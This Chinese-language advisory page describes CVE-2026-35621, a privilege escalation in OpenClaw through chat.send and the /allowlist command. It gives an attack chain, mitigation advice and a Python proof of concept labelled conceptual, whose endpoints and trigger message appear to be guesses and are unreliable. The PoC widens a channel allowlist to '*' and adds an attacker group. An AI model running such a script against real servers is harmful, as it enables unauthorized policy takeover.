CVE-2026-35621 CVSS 6.5 中危

CVE-2026-35621 OpenClaw权限提升漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35621

漏洞类型

权限提升

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.24之前的版本中存在权限提升漏洞。由于/allowlist命令在处理内部调用者时未重新验证网关客户端的权限范围，导致仅拥有operator.write权限的客户端能够修改通道授权策略。攻击者可利用chat.send接口构建内部命令授权上下文，进而持久化地修改本应仅限operator.admin权限操作的allowFrom和groupAllowFrom策略，实现权限提升。

技术细节

该漏洞的核心机制在于OpenClaw对内部调用者的信任边界处理不当。当系统接收到通过chat.send接口构建的请求时，会生成一个“内部命令授权上下文”。正常情况下，修改通道的allowFrom和groupAllowFrom策略需要operator.admin权限。然而，/allowlist命令在处理被标记为“内部”的上下文时，跳过了对客户端权限范围的二次校验。攻击者首先获取一个具有operator.write低权限的令牌，随后利用chat.send接口诱导系统建立内部上下文。利用该上下文调用/allowlist命令时，系统错误地认为调用者具有足够权限，从而允许低权限用户修改高级别的安全策略，破坏了系统的完整性。

攻击链分析

STEP 1

1. 获取低权限凭证

攻击者获取一个具有operator.write权限的API令牌或会话ID。

STEP 2

2. 构造内部上下文

利用chat.send接口发送特定消息，诱导系统将当前会话标记为“内部命令授权上下文”，绕过初步网关检查。

STEP 3

3. 执行越权命令

使用建立的上下文调用/allowlist命令，尝试修改通道的allowFrom或groupAllowFrom策略。

STEP 4

4. 持久化策略更改

由于/allowlist未对内部调用者进行二次鉴权，恶意策略被系统接受并持久化存储，完成权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC for CVE-2026-35621
# Exploiting privilege escalation via chat.send context

import requests

def exploit(target_url, operator_write_token):
    headers = {
        "Authorization": f"Bearer {operator_write_token}",
        "Content-Type": "application/json"
    }
    
    # Step 1: Build internal command-authorized context using chat.send
    # This specific endpoint/action prepares the internal context
    chat_payload = {
        "action": "chat.send",
        "channel": "system",
        "message": "trigger_internal_context"
    }
    
    print("[+] Step 1: Building internal context via chat.send...")
    session = requests.Session()
    resp = session.post(f"{target_url}/api/chat", json=chat_payload, headers=headers)
    
    if resp.status_code != 200:
        print("[-] Failed to establish context.")
        return

    # Step 2: Abuse /allowlist command to mutate policy
    # Normally restricted to operator.admin
    allowlist_payload = {
        "command": "/allowlist",
        "params": {
            "channel": "private-channel",
            "allowFrom": "*",  # Malicious policy change
            "groupAllowFrom": "attacker-group"
        }
    }
    
    print("[+] Step 2: Sending malicious /allowlist command...")
    exploit_resp = session.post(f"{target_url}/api/command", json=allowlist_payload, headers=headers)
    
    if exploit_resp.status_code == 200:
        print("[+] Exploit successful! Policy persisted.")
    else:
        print("[-] Exploit failed.")

# Usage
# exploit("http://openclaw-server", "WRITE_TOKEN_HERE")

影响范围

OpenClaw < 2026.3.24

防御指南

临时缓解措施

建议立即升级到OpenClaw 2026.3.24或更高版本以彻底修复此漏洞。如果暂时无法升级，应严格审查日志中关于chat.send和allowlist的调用记录，并通过网络策略限制对管理接口的访问，仅允许受信任的IP地址连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表